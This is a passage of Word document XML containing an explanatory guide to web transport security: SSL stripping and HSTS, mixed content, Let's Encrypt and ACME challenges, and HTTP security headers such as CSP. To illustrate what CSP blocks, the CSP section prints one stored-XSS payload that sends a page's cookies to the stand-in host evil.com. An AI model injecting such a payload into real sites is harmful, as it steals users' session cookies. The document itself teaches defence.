        <w:t>Intercept the HTTP request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6A8C1D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="833"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Establish an HTTPS connection to the real server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648E3230" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="833"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Return an HTTP response to the client (stripping the HTTPS redirect).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E284CCE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="833"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Sit in the middle, decrypting HTTPS ↔ HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B174DDC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>The client never uses HTTPS — the attacker transparently proxies, seeing all traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3812AE4A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HSTS solves this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB51DA8" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>The server includes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223F8888" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A657C5B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Strict-Transport-Security: max-age=31536000; includeSubDomains; preload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22609CAE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>The browser stores this directive. For max-age seconds (31536000 = 1 year), the browser </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>automatically converts all HTTP requests to HTTPS before sending them</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> — no HTTP request ever leaves the browser. SSL stripping is impossible because the browser never sends an HTTP request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F678F28" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The HSTS chicken-and-egg problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> The browser only learns about HSTS after the first HTTPS visit. The first visit (if HTTP) is still vulnerable to SSL stripping. Solution: </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HSTS Preload List</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> — a hardcoded list of domains that require HTTPS, built into browsers (Chrome, Firefox, Safari, Edge). Domains submit to </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="006F072B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>hstspreload.org</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">. Once on the preload </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>list, the browser requires HTTPS </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>from the very first visit</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t>, even before ever connecting to the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EBEA76" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HSTS includeSubDomains:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Applies the policy to all subdomains. Essential — without it, an attacker could redirect sub.example.com HTTP traffic even if example.com has HSTS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8EB7A9" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mixed Content — The HTTPS Weakening Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0128C5E9" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>An HTTPS page that loads </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>any HTTP subresource</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> (image, script, stylesheet, iframe, font) has </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>mixed content</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t>. The HTTPS page's security guarantees are weakened:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143D2442" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Active mixed content (scripts, stylesheets, iframes over HTTP):</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> The HTTP resource can modify the page's DOM. An HTTP script can steal HTTPS cookies, HTTPS credentials, and modify the secure page's content. Browsers </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>block active mixed content</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> — the HTTP resource is simply not loaded, and a console error is shown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A4BCB1" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Passive mixed content (images, videos, audio over HTTP):</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Cannot modify the DOM but is still visible to network eavesdroppers (image content is plaintext). Browsers display a </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>warning</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> (the padlock icon changes) but may still load the resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E78092" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Content Security Policy (CSP):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763C2DF3" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBBC1B7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Content-Security-Policy: upgrade-insecure-requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27038A6F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Automatically upgrades HTTP subresource requests to HTTPS. The browser changes http:// to https:// for all subresource requests — fixing mixed content issues without updating every HTML tag. If the HTTPS version doesn't exist, the subresource fails to load (preferable to loading over HTTP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE28F07" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Certificate Management — Let's Encrypt and ACME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0795DD0F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The historical barrier to HTTPS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4E2FF0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Before Let's Encrypt (2015), SSL certificates cost $100–$400/year per domain, required manual procurement, and had complex validation processes. This cost and complexity kept many sites on HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2191D977" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Let's Encrypt changed everything:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73506472" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Let's Encrypt is a free, automated CA. The </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ACME protocol</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> (Automated Certificate Management Environment, RFC 8555) automates the entire certificate lifecycle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2A6EC9" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Domain Control Validation (DCV) via ACME:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE8FB25" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>The ACME client (Certbot, acme.sh, etc.) proves domain control through one of three challenge types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F7AA76" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>HTTP-01 challenge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7853399F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="834"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>ACME server provides a token: abc123.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD670EA" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="834"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Client places a file at http://example.com/.well-known/acme-challenge/abc123 with content abc123.keyAuthorization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB68710" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="834"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>ACME server fetches the URL and verifies the content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61686AA5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="834"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Certificate issued.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD0231D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Limitation: Requires port 80 to be accessible. Can't be used for wildcard certificates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E0144F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>DNS-01 challenge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1377EF72" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="835"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>ACME server provides a token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B29AC98" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="835"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Client creates DNS TXT record: _acme-challenge.example.com = &lt;token-based-value&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CF4EAA" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="835"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>ACME server resolves the DNS TXT record and verifies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14098496" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="835"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Certificate issued.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C302424" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Advantage: Works for wildcard certificates (*.example.com). Works for servers not accessible from the internet. Can be fully automated with DNS provider APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE75503" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>TLS-ALPN-01 challenge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB54F6C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="836"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>ACME server connects to port 443 of the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB4BB79" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="836"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Client responds with a special certificate (containing the ACME token in a SAN extension) during TLS handshake, using acme-tls/1 ALPN protocol.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C88F79B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="836"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>ACME server verifies the certificate content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8FEFD1" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Advantage: Only requires port 443, no HTTP or DNS access needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EFFE2A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Automatic renewal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F677EA" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>ACME-based clients automatically renew certificates before expiry (typically when 2/3 of validity has elapsed — Let's Encrypt issues 90-day certificates, renewal at day 60). Cron jobs or daemon processes run the renewal automatically. Certificate expiry is no longer an operational concern — expired certificate outages are eliminated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1462F9CB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="4C3569A0">
          <v:rect id="_x0000_i3575" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3415938C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. HTTP Security Headers — Defense in Depth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACA418B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>HTTPS provides transport security. </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP security headers</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> provide application-layer security — protecting against XSS, clickjacking, content injection, and information leakage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C41499C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Content Security Policy (CSP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB1D6E3" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>CSP defines which sources of content (scripts, stylesheets, images, frames) are trusted:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148DADFD" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A588F90" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">Content-Security-Policy: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52885A2F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  default-src 'self';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F892DE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  script-src 'self' https://cdn.example.com 'nonce-abc123';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022727AB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  style-src 'self' 'unsafe-inline';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33297681" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  img-src 'self' data: https:;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B41339" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  connect-src 'self' https://api.example.com;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5252D1" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  frame-ancestors 'none';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643FDEFC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  report-uri /csp-violation-report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015A5932" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How CSP prevents XSS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021C7902" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Without CSP, if an attacker injects &lt;script&gt;document.location='https://evil.com/?c='+document.cookie&lt;/script&gt; into the page (via stored XSS), the browser executes it — stealing cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195AEACB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>With CSP script-src 'self', the injected inline script is </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>blocked</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> — only scripts from the same origin or the specified CDN are allowed. Inline scripts require a </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nonce</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> (nonce-abc123) — a cryptographically random value generated per response and included in both the CSP header and the &lt;script nonce="abc123"&gt; tag. An attacker's injected script doesn't know the nonce → blocked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEE1B0A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CSP report-only mode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C901D0B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB71F64" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Content-Security-Policy-Report-Only: default-src 'self'; report-uri /csp-reports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3C047C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>Violations are reported but not blocked. Used to test CSP policies without breaking the site — collect reports, fix violations, then switch to enforcement mode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C84FBFC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Other Critical Security Headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C3E4F6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>X-Frame-Options / frame-ancestors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A33994B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188CA99D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>X-Frame-Options: DENY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6753BDEE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
